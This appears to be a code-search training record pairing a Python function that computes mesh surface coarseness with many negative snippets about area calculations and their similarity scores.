def get_coarseness(my_core, meshset, entity_ranges, geom_dim): coarseness = [] for surface in entity_ranges: surf_area = get_area_triangle(my_core, surface, geom_dim) coarseness.append(len(surf_area)/sum(surf_area)) return coarseness
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_surface_area(self):\n return np.sum(self._find_triangle_areas())", "def compute_area(self):\r\n\r\n \"\"\"Косое произведение векторов\r\n A = (x2-x1; y2-y1; z2-z1)\r\n B = (x3-x1; y3-y1; z3-z1)\r\n S = 0.5*sqrt((Ay*Bz - Az*By)^2 + (Az*Bx - Ax*Bz)^2 + (Ax*By - Ay*Bx)^2 )\r\n \"\"\"\r\n a_x = self.x2 - self.x1\r\n a_y = self.y2 - self.y1\r\n a_z = self.z2 - self.z1\r\n\r\n b_x = self.x3 - self.x1\r\n b_y = self.y3 - self.y1\r\n b_z = self.z3 - self.z1\r\n\r\n self.area = 0.5 * math.sqrt((a_y * b_z - a_z * b_y) ** 2 + (a_z * b_x - a_x * b_z) ** 2 + (a_x * b_y - a_y * b_x) ** 2)\r\n\r\n \"\"\"По теореме Герона\"\"\"\r\n # a = math.sqrt((self.x1-self.x2)**2 + (self.y1-self.y2)**2 + (self.z1-self.z2)**2)\r\n # b = math.sqrt((self.x1-self.x3)**2 + (self.y1-self.y3)**2 + (self.z1-self.z3)**2)\r\n # c = math.sqrt((self.x2-self.x3)**2 + (self.y2-self.y3)**2 + (self.z2-self.z3)**2)\r\n # p = 0.5 * (a + b + c)\r\n # self.area = math.sqrt(p * (p - a) * (p - b) * (p - c))\r", "def solidity(cnt):\n\tarea = cv2.contourArea(cnt)\n\thull = cv2.convexHull(cnt)\n\thull_area = cv2.contourArea(hull)\n\treturn float(area) / hull_area", "def test_get_triangle_area():\n v1 = (0,0); v2 = (1,0); v3 = (0,2)\n verticies = [v1,v2,v3]\n expected = 1\n computed = get_triangle_area(verticies)\n tol = 1E-14\n success = abs(expected-computed) < tol\n msg = 'computed area={} != {} (expected)'.format(computed,expected)\n assert success,msg", "def area(self) -> float:\n return cross3(self.b.position - self.a.position,\n self.c.position - self.a.position).length() / 2.0", "def triangle_area(side1: number, side2: number, side3: number) -> number:\n s = (side1+side2+side3)/2\n area = sqrt(s*(s-side1)*(s-side2)*(s-side3))\n return sqrt(s*(s-side1)*(s-side2)*(s-side3))", "def triangleArea(a: Vec3, b: Vec3, c: Vec3) -> float:\n return cross3(b - a, c - a).length() / 2.0", "def surface_area(self) -> float:\n return 4 * np.pi * self.radius**2", "def surface_area_of_cube(side):\n return side", "def compute_triangle_area(a,b,c):\n ab = np.sqrt( ((a-b)**2).sum() )\n ac = np.sqrt( ((a-c)**2).sum() )\n bc = np.sqrt( ((b-c)**2).sum() )\n \n s = (ab+ac+bc)/2\n area = np.sqrt(s*(s-ab)*(s-bc)*(s-ac))\n \n return area", "def rectangle_surface_area(a,b):\n return (a*b)", "def calc_surface_area(faces, verts):\n # Calculate the surface area of a mesh from it's triangle faces.\n # faces: List of all the faces on the surface. 
Each face indexes three\n # points from verts which make up the triangle face.\n # verts: List of all the vertices on the surface.\n area = 0\n for face in faces:\n # Extract x's and y's from the face's vertices.\n xs = [verts[face[0]][0], verts[face[1]][0], verts[face[2]][0]]\n ys = [verts[face[0]][1], verts[face[1]][1], verts[face[2]][1]]\n # Compute area of face from triangle points.\n base = max(xs) - min(xs)\n height = max(ys) - min(ys)\n area += 0.5 * (base + height)\n return area", "def surfaceArea(self):\n surfaceArea = self.sideLength**2 * 6\n return surfaceArea", "def area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def square_surface_area(a):\n return (a*a)", "def area(boxes):\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def area(poly):\n if len(poly) < 3: # not a plane - no area\n return 0\n total = [0, 0, 0]\n num = len(poly)\n for i in range(num):\n vi1 = poly[i]\n vi2 = poly[(i+1) % num]\n prod = np.cross(vi1, vi2)\n total[0] += prod[0]\n total[1] += prod[1]\n total[2] += prod[2]\n result = np.dot(total, unit_normal(poly[0], poly[1], poly[2]))\n return abs(result/2)", "def area(self) -> npt.NDArray[np.float_]:\n points = self._normalized_projection()\n a = sum(det(points[..., [0, i, i + 1], :]) for i in range(1, points.shape[-2] - 1))\n return 1 / 2 * np.abs(a)", "def area_triangle_sss(side1,side2,side3):\n semi_perim=(side1+side2+side3)/2.0\n return math.sqrt(semi_perim*\n (semi_perim - side1)*\n (semi_perim - side2)*\n (semi_perim - side3)\n )", "def findArea(self):\n\n a, b = self.sides\n area = a * b\n print(f\"Are of rectangle is: {area}\")", "def getSurfaceArea(self) -> float:\n return self.area()", "def compute_area(boxes):\n area = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])\n\n return area", "def area(triangles):\n # sides of the triangle\n sides = great_circle_distance(triangles,\n numpy.roll(triangles, 1, axis=1))\n\n assert numpy.all(sides >= 0.)\n\n # s = (a + b + c) / 2.\n s = (numpy.sum(sides, axis=1) / 2.)\n\n # tan(s / 2) * tan((s - a) / 2) * tan((s - b) / 2) * tan((s - c) / 2)\n product = (tan(s / 2.) *\n numpy.prod(tan((s[:, numpy.newaxis] - sides) / 2.), axis=1))\n\n try:\n return 4. * arctan(sqrt(product))\n except FloatingPointError:\n # floating point weirdness\n\n def individual(prod):\n \"\"\"\n Area of an individual triangle.\n \"\"\"\n try:\n return 4. 
* arctan(sqrt(prod))\n except FloatingPointError:\n return 0.\n\n return numpy.array([individual(prod) for prod in product])", "def area(self) -> float:\n raise NotImplementedError", "def area_triangle_sss(side1, side2, side3):\n \n # Use Heron's formula\n semiperim = (side1 + side2 + side3) / 2.0\n return math.sqrt(semiperim *\n (semiperim - side1) *\n (semiperim - side2) * \n (semiperim - side3))", "def triangle_area(a, b, c):\n\n return 0.5 * abs(\n a[0] * (b[1] - c[1]) +\n b[0] * (c[1] - a[1]) +\n c[0] * (a[1] - b[1])\n )", "def getArea(self, p1, p2, p3):\n matrix = [p1.normalVector, p2.normalVector, p3.normalVector, [1,1,1,1]]\n matrix = np.rot90(matrix)\n return abs(np.linalg.det(matrix))/2.0", "def area(self):\n area = 0\n\n for room in self.rooms:\n area += room.polygon.area()\n\n for wall in self.walls:\n area += wall.polygon.area()\n\n return area", "def compute_triangle_area(vertices):\n v01 = vertices[0] - vertices[1]\n v02 = vertices[0] - vertices[2]\n cross_prod = np.cross(v01, v02)\n area = 0.5 * np.linalg.norm(cross_prod)\n return area", "def area(x1, y1, x2, y2, x3, y3):\n return abs((x1 * (y2 - y3) + x2 * (y3 - y1) + x3 * (y1 - y2)) / 2.0)", "def get_coverage_area(self) -> float:\n return math.sqrt(self.norm_hull.volume)", "def surface_area_cube(side_length: float) -> float:\r\n if side_length < 0:\r\n raise ValueError(\"surface_area_cube() only accepts non-negative values\")\r\n return 6 * side_length**2", "def test_triangle_get_area(self):\n triangle = Triangle(0, 9, 10, 11)\n self.assertEqual(triangle.get_area(), 42.42640687119285)", "def cube_area(side_length):\n area = side_length ** 3\n return area", "def circle_surface_area(a):\n return (a*a*math.pi)", "def area(boxes: Union[np.array, torch.Tensor]) -> Union[np.array, torch.Tensor]:\n return (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])", "def test_triangle(self):\n result = shape_area.triangle_area(10,5)\n self.assertEqual(result,25)", "def areaOfTriangle(triangle):\n a = np.linalg.norm(triangle[..., 0, :] - triangle[..., 1, :])\n b = np.linalg.norm(triangle[..., 1, :] - triangle[..., 2, :])\n c = np.linalg.norm(triangle[..., 2, :] - triangle[..., 0, :])\n s = (a+b+c)/2\n # Herons formula\n return np.sqrt(s*(s-a)*(s-b)*(s-c))", "def area(self) -> npt.NDArray[np.float_]:\n return np.sum(self.faces.area)", "def area(self):\n if len(self.exterior) < 3:\n raise Exception(\"Cannot compute the polygon's area because it contains less than three points.\")\n poly = self.to_shapely_polygon()\n return poly.area", "def get_artif_area(self):\n result = self.cities.all().aggregate(total=Sum(\"surface_artif\"))\n return result[\"total\"] or 0", "def surface_area_cone(radius: float, height: float) -> float:\r\n if radius < 0 or height < 0:\r\n raise ValueError(\"surface_area_cone() only accepts non-negative values\")\r\n return pi * radius * (radius + (height**2 + radius**2) ** 0.5)", "def cylinder_area(radius: number, height: number) -> number:\n area = 2*pi*radius*(radius+height)\n return area", "def surface_area(DEM, resolution):\n\n resolution_squared = resolution ** 2.\n cross_distance_squared = 2.0 * (resolution ** 2.)\n\n m1 = ((DEM[0:-1, 0:-1] - DEM[0:-1, 1:]) ** 2.0 + resolution_squared) ** 0.5\n m2 = ((DEM[0:-1, 0:-1] - DEM[1:, 0:-1]) ** 2.0 + resolution_squared) ** 0.5\n m3 = ((DEM[0:-1, 0:-1] - DEM[1:, 1:]) ** 2.0 + cross_distance_squared) ** 0.5\n m4 = ((DEM[0:-1, 1:] - DEM[1:, 1:]) ** 2.0 + resolution_squared) ** 0.5\n m5 = ((DEM[1:, 0:-1] - DEM[1:, 1:]) ** 2.0 + resolution_squared) ** 0.5\n\n #from pdb 
import set_trace; set_trace()\n # Heron's formula for computing the area of a triangle, knowing 3 sides lengths,\n # requires a semiperimeter variable \"s\"\n s1 = 0.5 * (m3 + m5 + m2)\n s2 = 0.5 * (m3 + m4 + m1)\n\n # Calculate area using Heron's formula. This computes the upper and lower triangle area for each set of 4 dem points\n area = np.sum(np.sqrt(s1 * (s1 - m3) * (s1 - m5) * (s1 - m2))) + np.sum(np.sqrt(s2 * (s2 - m3) * (s2 - m4) * (s2 - m1)))\n\n return area", "def _get_area_polygon(points_x, points_z):\n area = 0\n j = len(points_x) - 1\n for i in range(len(points_x)):\n area = area + (\n points_x[j] + points_x[i]\n ) * (points_z[j] - points_z[i])\n j = i\n return np.abs(area / 2)", "def area_of_a_triangle(length_1, length_2, length_3):\r\n half_perimeter = (length_1 + length_2 + length_3) / 2\r\n area = (half_perimeter * (half_perimeter-length_1) * (half_perimeter-length_2) * (half_perimeter-length_3)) ** 0.5\r\n return area", "def compute_triangle_area(triangle_points: np.ndarray) -> float:\n (x1, y1), (x2, y2), (x3, y3) = unpack_triangle_coordinates(triangle_points)\n # Pythagorean theorem\n l1 = sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n l2 = sqrt((x2 - x3) ** 2 + (y2 - y3) ** 2)\n l3 = sqrt((x3 - x1) ** 2 + (y3 - y1) ** 2)\n # Heron's Formula\n semi_perimeter = (l1 + l2 + l3) / 2\n to_sqrt = semi_perimeter * (semi_perimeter - l1) * (semi_perimeter - l2) * (semi_perimeter - l3)\n to_sqrt = to_sqrt if to_sqrt > 0 else 0\n area = sqrt(to_sqrt)\n return area", "def area(cnt):\n\treturn cv2.contourArea(cnt)", "def compute_mesh_area(mesh):\n vertices = mesh.vertices\n faces = mesh.faces\n areas = [compute_triangle_area(vertices[face]) for face in faces]\n mesh_surface_area = sum(areas)\n return mesh_surface_area", "def test_convexHullFacetArea(self):\n try:\n import pyhull\n except ImportError:\n self.skipTest(\"Pyhull (optional) is not available so cannot compute facet area.\")\n \n # make points\n N = 8\n pts = [0, 0, 0,\n 3, 0, 0,\n 0, 3, 0,\n 0, 0, 3,\n 3, 3, 0,\n 0, 3, 3,\n 3, 0, 3,\n 3, 3, 3]\n \n # calc volume\n volume, facetArea = clusters.findConvexHullVolume(N, pts)\n \n self.assertAlmostEqual(facetArea, 54.0)", "def test_area():\n\n pt0 = [0, 0]\n pt1 = [5, 5]\n pt2 = [5, 0]\n\n truth = 12.5\n\n assert isclose(truth, area([pt0, pt1, pt2]))", "def area(self):\n l = len(self.points)\n if l < 3: # The form has no point, is a single point or a segment, so it has no area.\n return 0\n elif l == 3: # The form is a triangle, so we can calculate its area.\n a, b, c = [Vector.createFromSegment(segment) for segment in self.sides]\n A = 1 / 4 * sqrt(4 * a.norm ** 2 * b.norm ** 2 - (a.norm ** 2 + b.norm ** 2 - c.norm ** 2) ** 2)\n return A\n else: # The form has more points than 3, so we can cut it in triangles.\n area = 0\n C = self.center\n for i in range(l):\n A = self.points[i]\n B = self.points[(i + 1) % l]\n triangle = Form([A, B, C])\n area += triangle.area\n return area", "def area(self):\n area = 0\n last = self._coordinates[-1]\n for c in self._coordinates:\n area += (last[0] * c[1] - last[1] * c[0])\n last = c\n return float(\"{:.2f}\".format(abs(area) * 0.5))", "def triangle_area(triangle):\n # sides of the triangle\n a = great_circle_distance(triangle[0], triangle[1])\n b = great_circle_distance(triangle[0], triangle[2])\n c = great_circle_distance(triangle[1], triangle[2])\n\n # it may happen that the triangle is degenerate\n # for the rare case where a fourth generator just\n # touches the circumcircle\n assert a >= 0.\n assert b >= 0.\n assert c >= 0.\n\n s = (a + b + 
c) / 2.\n\n # does not quite work for extra large polygons\n # where area is ambiguous\n try:\n return 4. * arctan(sqrt(tan(s / 2.) *\n tan((s - a) / 2.) *\n tan((s - b) / 2.) *\n tan((s - c) / 2.)))\n except FloatingPointError:\n # floating point weirdness\n return 0.", "def test_circumference_area(self):\n self.assertEqual(9.425, circumference_area(self.values['radius']))", "def cone_area(radius: number, height: number) -> number:\n return pi*radius*(radius + sqrt(radius**2 + height**2))", "def _area(bounds):\n return (bounds[0, 1] - bounds[0, 0]) * (bounds[1, 1] - bounds[1, 0])", "def area(self):\n area = 0.25*self._sides*self._length**2 / math.tan(math.radians(180/self._sides))\n return float('{:.2f}'.format(area))", "def area_equilat(side):\n\treturn side/2 * math.sqrt(side**2 - (side/2)**2)", "def area(self) -> torch.Tensor:\n box = self.tensor\n area = (box[:, 2] - box[:, 0]) * (box[:, 3] - box[:, 1])\n return area", "def area_polygon(polygon):\n o = centroid_points(polygon)\n u = subtract_vectors(polygon[-1], o)\n v = subtract_vectors(polygon[0], o)\n a = 0.5 * length_vector(cross_vectors(u, v))\n for i in range(0, len(polygon) - 1):\n u = v\n v = subtract_vectors(polygon[i + 1], o)\n a += 0.5 * length_vector(cross_vectors(u, v))\n return a", "def calculate_areas(polygon):\n project = ft.partial(pj.transform,\n pj.Proj(init='epsg:4326'),\n pj.Proj('+proj=eck4 +lat_0=' + str(polygon.centroid.y) + ' +lon_0=' + str(polygon.centroid.x)))\n field_projected = transform(project, polygon)\n # convert from square meters to acres\n return uom.Uom(field_projected.area, uom.SquareMeter)", "def pcw(coords):\n n = len(coords)\n xl = coords[0:n-1,0]\n yl = coords[1:,1]\n xr = coords[1:,0]\n yr = coords[0:n-1,1]\n a = xl*yl - xr*yr\n area = a.sum()\n if area < 0:\n return 1\n else:\n return 0", "def area_triangle_three_sides(side1: float, side2: float, side3: float) -> float:\r\n if side1 < 0 or side2 < 0 or side3 < 0:\r\n raise ValueError(\"area_triangle_three_sides() only accepts non-negative values\")\r\n elif side1 + side2 < side3 or side1 + side3 < side2 or side2 + side3 < side1:\r\n raise ValueError(\"Given three sides do not form a triangle\")\r\n semi_perimeter = (side1 + side2 + side3) / 2\r\n area = sqrt(\r\n semi_perimeter\r\n * (semi_perimeter - side1)\r\n * (semi_perimeter - side2)\r\n * (semi_perimeter - side3)\r\n )\r\n return area", "def compute_mesh_area_smart(mesh):\n mesh_surface_area = mesh.area\n return mesh_surface_area", "def area(self):\n return 0.5*np.abs(np.dot(self.x,np.roll(self.y,1))-np.dot(self.y,np.roll(self.x,1)))", "def cube_area(edge : number) -> number:\n area = 6*edge*edge\n\n return area", "def polygon_area(ppath): # pragma: no cover\n v_ = ppath.vertices\n if len(v_) < 3:\n return 0.0\n x_ = v_[:, 1] - v_[:, 1].mean()\n y_ = v_[:, 0] - v_[:, 0].mean()\n correction = x_[-1] * y_[0] - y_[-1] * x_[0]\n main_area = np.dot(x_[:-1], y_[1:]) - np.dot(y_[:-1], x_[1:])\n return 0.5 * np.abs(main_area + correction)", "def _triangle_area_at_points(self, p1, p2, p3):\n a = sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n b = sqrt((p2[0] - p3[0]) ** 2 + (p2[1] - p3[1]) ** 2)\n c = sqrt((p1[0] - p3[0]) ** 2 + (p1[1] - p3[1]) ** 2)\n s = (a + b + c) / float(2)\n area = sqrt(s * (s - a) * (s - b) * (s - c))\n return area", "def compute_area(boxes: Type[Union[Tensor, np.ndarray]]):\n if isinstance(boxes, Tensor):\n return compute_area_pt(boxes)\n return ((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]))", "def ext_surface_area(self, rho_p, d_p):\n ac = 
6./(d_p*rho_p)\n return ac", "def area(triangles=None, crosses=None, sum=False):\n if crosses is None:\n crosses = cross(triangles)\n area = (np.sum(crosses**2, axis=1)**.5) * .5\n if sum:\n return np.sum(area)\n return area", "def triangle_area(base, height):\n return (base * height) / 2", "def area_triangle(w, h):\n return w * h / 2", "def area(x, y):\n return x*y/2", "def read_surf_area(self, conf_path):\n ct = os.path.join(conf_path, 'CONTCAR')\n \n with open(ct, 'r') as f:\n dat = f.readlines()[2:5]\n a1 = list(map(float, dat[0].strip().split()))\n a2 = list(map(float, dat[1].strip().split()))\n return np.linalg.norm(np.cross(a1, a2))", "def area(self):\n if isinstance(self.crs, GeographicalCRS):\n major_axis = self.crs.ellipsoid.a\n minor_axis = self.crs.ellipsoid.b\n\n area = 0.0\n if major_axis == minor_axis: # Sphere\n for seg in self.segment_tuples:\n x1, y1 = seg[0]\n x2, y2 = seg[1]\n area += geodesy.spherical_area(major_axis, x1, y1, x2, y2)\n\n else:\n for seg in self.segment_tuples:\n x1, y1 = seg[0]\n x2, y2 = seg[1]\n area += geodesy.ellipsoidal_area(major_axis, minor_axis,\n x1, y1, x2, y2)\n\n else:\n # Cartesian coordinate systems\n x, y = self.coordinates\n x0 = np.min(x)\n area = (0.5*(x[0] + x[-1]) - x0) * (y[0] - y[-1])\n area += sum((0.5*(x[i+1]+x[i]) - x0) * (y[i+1] - y[i]) for i in range(len(x)-1))\n return abs(area) - sum(sub.area for sub in self.subs)", "def area(self):\n\t\t#print (self.radius*self.radius*math.pi)\n\t\tcircle_area = (self.radius*self.radius*math.pi)\n\t\treturn circle_area", "def triarea(a, b, c):\n return 0.5 * edist(a, b) * pdist(c, a, b)", "def regular_polygon_area(perimeter, apothem):\n return (perimeter * apothem) / 2", "def calculateDetectorArea(self):\n area = 0.0\n r = self.geoParam['CylinderLightGuideRadius']\n while(r + self.geoParam['DetectorThickness'] < self.geoParam['CylinderRadius']):\n area -= math.pow(r,2)\n r += self.geoParam['DetectorThickness']\n area += math.pow(r,2)\n r += self.geoParam['DetectorSpacing']\n return math.pi*area", "def getArea(self):\n asum = 0.0\n for quad in self._quadrilaterals:\n w = get_quad_width(quad)\n l = get_quad_length(quad)\n asum = asum + w * l\n return asum", "def surface_area_cuboid(length: float, breadth: float, height: float) -> float:\r\n if length < 0 or breadth < 0 or height < 0:\r\n raise ValueError(\"surface_area_cuboid() only accepts non-negative values\")\r\n return 2 * ((length * breadth) + (breadth * height) + (length * height))", "def rectangle_area(side1, side2):\n return float(side1) * float(side2)", "def surface_area(self):\n return self._surface_area", "def test_triangle_area(self):\n self.assertEqual(6, triangle_area(\n self.values['base'], self.values['height']))", "def test_triangle_positive_area(self):\n t = Triangle(Point(0, 3.1415), Point(2.7, 3), Point(3 ** 0.5, 6.023))\n self.assertEqual(t.area(1), 4.0,\n \"Test of Triangle(Point(0, 3.1415), Point(2.7, 3), Point(3 ** 0.5, 6.023)).area(1),\\\n returned value != 4.0.\")\n self.assertEqual(t.area(), 4.013,\n \"Test of Triangle(Point(0, 3.1415), Point(2.7, 3), Point(3 ** 0.5, 6.023)).area(1) failed,\\\n returned value != 4.013.\")\n self.assertEqual(t.area(6), 4.012568,\n \"Test of Triangle(Point(0, 3.1415), Point(2.7, 3), Point(3 ** 0.5, 6.023)).area(6) failed,\\\n returned value != 4.012568.\")", "def area(boxes):\n y_min, x_min, y_max, x_max = np.split(boxes, 4, axis=-1)\n return np.squeeze((y_max - y_min) * (x_max - x_min), [1])", "def face_areas(self, point):\n surface_metrics_bp = 
self.surface_metric_matrices(point)\n return gs.sqrt(gs.linalg.det(surface_metrics_bp))", "def km2_area(polygons):\n\n reprojected_polygons = [reproject(p) for p in polygons]\n return ops.cascaded_union(reprojected_polygons).area * 1e-6", "def calculate_area_ratio(gt_area, perf_area):\n return min(gt_area, perf_area) / max(gt_area, perf_area)", "def calculate_area(boxes):\n box_dimension = len(boxes.size())\n if (box_dimension == 1) and (boxes.size()[0] != 0):\n return (boxes[3] - boxes[1] + 1) * (boxes[2] - boxes[0] + 1)\n elif box_dimension == 2:\n return (boxes[:, 3] - boxes[:, 1] + 1) * (boxes[:, 2] - boxes[:, 0] + 1)\n else:\n return torch.tensor([])", "def area_triangle(triangle):\n return 0.5 * length_vector(normal_triangle(triangle, False))", "def getComponentArea(self, cold=False):\n from armi.reactor.blocks import Block # avoid circular import\n\n block = self.getAncestor(lambda c: isinstance(c, Block))\n return self.getComponentVolume(cold) / block.getHeight()\n # raise NotImplementedError(\"Cannot compute area of a sphere component.\")", "def test_polygon_area(self):\n\n # Create closed simple polygon (counter clock wise)\n P = numpy.array([[0, 0], [1, 0], [1, 1], [0, 1], [0, 0]])\n A = calculate_polygon_area(P)\n msg = 'Calculated area was %f, expected 1.0 deg^2' % A\n assert numpy.allclose(A, 1), msg\n\n # Create closed simple polygon (clock wise)\n P = numpy.array([[0, 0], [0, 1], [1, 1], [1, 0], [0, 0]])\n A = calculate_polygon_area(P)\n msg = 'Calculated area was %f, expected 1.0 deg^2' % A\n assert numpy.allclose(A, 1), msg\n\n A = calculate_polygon_area(P, signed=True)\n msg = 'Calculated signed area was %f, expected -1.0 deg^2' % A\n assert numpy.allclose(A, -1), msg\n\n # Not starting at zero\n # Create closed simple polygon (counter clock wise)\n P = numpy.array([[168, -2], [169, -2], [169, -1],\n [168, -1], [168, -2]])\n A = calculate_polygon_area(P)\n\n msg = 'Calculated area was %f, expected 1.0 deg^2' % A\n assert numpy.allclose(A, 1), msg\n\n # Realistic polygon\n filename = '%s/%s' % (TESTDATA, 'test_polygon.shp')\n layer = read_layer(filename)\n geometry = layer.get_geometry()\n\n P = geometry[0]\n A = calculate_polygon_area(P)\n\n # Verify against area reported by qgis (only three decimals)\n qgis_area = 0.003\n assert numpy.allclose(A, qgis_area, atol=1.0e-3)\n\n # Verify against area reported by ESRI ARC (very good correspondence)\n esri_area = 2.63924787273461e-3\n assert numpy.allclose(A, esri_area, rtol=0, atol=1.0e-10)", "def shaded_area(l):\n area = area_square(l) - area_circle(l)\n return area", "def test_area(self):\n s1 = Square(3)\n self.assertEqual(9, s1.area())\n s4 = Square(5, 0, 0, 12)\n self.assertEqual(25, s4.area())", "def test_square(self):\n result = shape_area.square_area(5)\n self.assertEqual(result,25)", "def verifyArea(self, w, h, square):\n valid_area = False\n area1 = w*h\n area2 = cv2.contourArea(cv2.convexHull(square))\n #print(\"w*h : {} contourArea: {}, ratio: {:.2f}\".format(area1, area2, area1/area2))\n if (((area1/area2) > 0.9) and ((area1/area2) < 1.1)):\n valid_area = True\n return valid_area", "def area(self, boxes):\n with tf.name_scope('area'):\n ymin, xmin, ymax, xmax = tf.unstack(boxes, axis=1)\n return (ymax - ymin) * (xmax - xmin)" ]
[ "0.72606695", "0.69087756", "0.6878328", "0.6759182", "0.66357255", "0.662495", "0.6603431", "0.6533843", "0.65235794", "0.6498596", "0.64894485", "0.643404", "0.64310247", "0.63980806", "0.63846767", "0.6348388", "0.6340205", "0.63149506", "0.62920696", "0.62676907", "0.62599206", "0.61904335", "0.6175555", "0.6149911", "0.6145471", "0.61437523", "0.61402535", "0.6133957", "0.6133523", "0.6132846", "0.613271", "0.61189765", "0.61102813", "0.6091487", "0.60729414", "0.60649896", "0.60512453", "0.6051182", "0.60500944", "0.6044575", "0.6043065", "0.6028307", "0.60252696", "0.6019837", "0.6011925", "0.600753", "0.5996481", "0.59947455", "0.5994655", "0.5977994", "0.5973249", "0.5969831", "0.5967895", "0.59624696", "0.5961604", "0.59525573", "0.5952098", "0.59287345", "0.59049517", "0.5884271", "0.58617485", "0.5857424", "0.58534455", "0.5850195", "0.58481765", "0.5840283", "0.5828231", "0.58273315", "0.58227015", "0.5816429", "0.58141124", "0.58119833", "0.58081806", "0.5801533", "0.5799247", "0.5785909", "0.5782337", "0.57772195", "0.5768827", "0.57600635", "0.5758808", "0.57573044", "0.5756956", "0.57558215", "0.5746036", "0.5742434", "0.57406455", "0.57256204", "0.5718095", "0.5714564", "0.5710754", "0.57096785", "0.57065845", "0.569674", "0.568983", "0.56863946", "0.56856906", "0.56854373", "0.56798464", "0.5679495" ]
0.6548548
7
Cleans the line from geometrical shape characters and replaces these with space.
def clean_text_from_geometrical_shape_unicode(line): line = re.sub(r"([\u25A0-\u25FF])", " ", line) return line
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def clean(line):\n line = line.strip('\\n').strip()\n line = line.replace('\\xe2\\x80\\x93', '-')\n line = line.replace('\\xe2\\x80\\x99', '\\'')\n\n return line", "def clean(line):\n line = line.lower().replace(\"\\n\",\" \").replace(\"\\r\",\"\").replace(',',\"\").replace(\">\",\"> \").replace(\"<\", \" <\").replace(\"|\",\" \")\n return line", "def prepare_text_line(line):\n\n re_sub = re.sub\n # FIXME: maintain the original character positions\n\n # strip whitespace\n line = line.strip()\n\n # strip comment markers\n # common comment characters\n line = line.strip('\\\\/*#%;')\n # un common comment line prefix in dos\n line = re_sub('^rem\\s+', ' ', line)\n line = re_sub('^\\@rem\\s+', ' ', line)\n # un common comment line prefix in autotools am/in\n line = re_sub('^dnl\\s+', ' ', line)\n # un common comment line prefix in man pages\n line = re_sub('^\\.\\\\\\\\\"', ' ', line)\n # un common pipe chars in some ascii art\n line = line.replace('|', ' ')\n\n # normalize copyright signs and spacing aournd them\n line = line.replace('(C)', ' (c) ')\n line = line.replace('(c)', ' (c) ')\n # the case of \\251 is tested by 'weirdencoding.h'\n line = line.replace(u'\\251', u' (c) ')\n line = line.replace('&copy;', ' (c) ')\n line = line.replace('&#169;', ' (c) ')\n line = line.replace('&#xa9;', ' (c) ')\n line = line.replace(u'\\xa9', ' (c) ')\n # FIXME: what is \\xc2???\n line = line.replace(u'\\xc2', '')\n\n # TODO: add more HTML entities replacements\n # see http://www.htmlhelp.com/reference/html40/entities/special.html\n # convert html entities &#13;&#10; CR LF to space\n line = line.replace(u'&#13;&#10;', ' ')\n line = line.replace(u'&#13;', ' ')\n line = line.replace(u'&#10;', ' ')\n\n # normalize (possibly repeated) quotes to unique single quote '\n # backticks ` and \"\n line = line.replace(u'`', \"'\")\n line = line.replace(u'\"', \"'\")\n line = re.sub(MULTIQUOTES_RE(), \"'\", line)\n # quotes to space? but t'so will be wrecked\n # line = line.replace(u\"'\", ' ')\n\n # some trailing garbage ')\n line = line.replace(\"')\", ' ')\n\n\n # note that we do not replace the debian tag by a space: we remove it\n line = re_sub(DEBIAN_COPYRIGHT_TAGS_RE(), '', line)\n\n line = re_sub(IGNORED_PUNCTUATION_RE(), ' ', line)\n\n # tabs to spaces\n line = line.replace('\\t', ' ')\n\n # normalize spaces around commas\n line = line.replace(' , ', ', ')\n\n # remove ASCII \"line decorations\"\n # such as in --- or === or !!! 
or *****\n line = re_sub(ASCII_LINE_DECO_RE(), ' ', line)\n line = re_sub(ASCII_LINE_DECO2_RE(), ' ', line)\n\n # Replace escaped literal \\0 \\n \\r \\t that may exist as-is by a space\n # such as in code literals: a=\"\\\\n some text\"\n line = line.replace('\\\\r', ' ')\n line = line.replace('\\\\n', ' ')\n line = line.replace('\\\\t', ' ')\n line = line.replace('\\\\0', ' ')\n\n # TODO: Why?\n # replace contiguous spaces with only one occurrence\n # line = re.sub(WHITESPACE_RE(), ' ', text)\n\n # normalize to ascii text\n line = commoncode.text.toascii(line)\n # logger.debug(\"ascii_only_text: \" + text)\n\n # strip verbatim back slash and comment signs again at both ends of a line\n # FIXME: this is done at the start of this function already\n line = line.strip('\\\\/*#%;')\n\n # normalize to use only LF as line endings so we can split correctly\n # and keep line endings\n line = commoncode.text.unixlinesep(line)\n # why?\n line = lowercase_well_known_word(line)\n\n return line", "def removeSingleChars(self) -> None:\n self.text = re.sub('\\s[^\\n\\s]\\s', ' ', self.text)", "def clean(text):\n new = text.replace(\"\\r\", \"\")\n new = new.replace(\"\\t\", \"\")\n new = new.replace(\"\\n\", \"\")\n new = new.replace(\"- \", \"-\")\n new = new.replace(\" \", \" \")\n return new", "def quote( self, aLine ):\n clean= aLine\n for from_, to_ in self.quoted_chars:\n clean= clean.replace( from_, to_ )\n return clean", "def remove_arrows(line):\n pattern = r'[\\+\\-][0-9]+'\n if type(line) != str:\n if (pd.isnull(line) == True) | (np.isnan(line) == True):\n return 'NaN'\n else:\n return line\n else:\n line = re.search(pattern, line)\n return line[0]", "def edit_google_vision_text(self,text):\n s1=text\n try:\n log_info(\"Correcting google vision text to remove extra spacing\",MODULE_CONTEXT)\n i=0\n while(i<len(text)):\n s1=text\n if text[i] in [\"/\",\"।\",'।' ,':','|',\",\" ,'०',\"]\",\"-\",\")\",\"}\"] and text[i-1]==\" \": \n text=text[:i-1]+text[i:]\n if i > 0 :\n if text[i-1] in [\"-\",\"[\",\"{\",\"/\",\"(\"] and text[i]==\" \":\n text=text[:i]+text[i+1:]\n elif text[i] in [\"-\",\"[\",\"{\",\"/\",\"(\"] and text[i+1]==\" \":\n text=text[:i+1]+text[i+2:]\n i=i+1\n except Exception as e:\n log_exception(\"Exception while correcting google vision text\", MODULE_CONTEXT, e)\n return s1\n return text", "def clean_line(self, line):\n\n if \"#\" in line:\n temp = line.split(\"#\")\n if len(temp) < 2:\n return \"\"\n else:\n temp = temp[0] 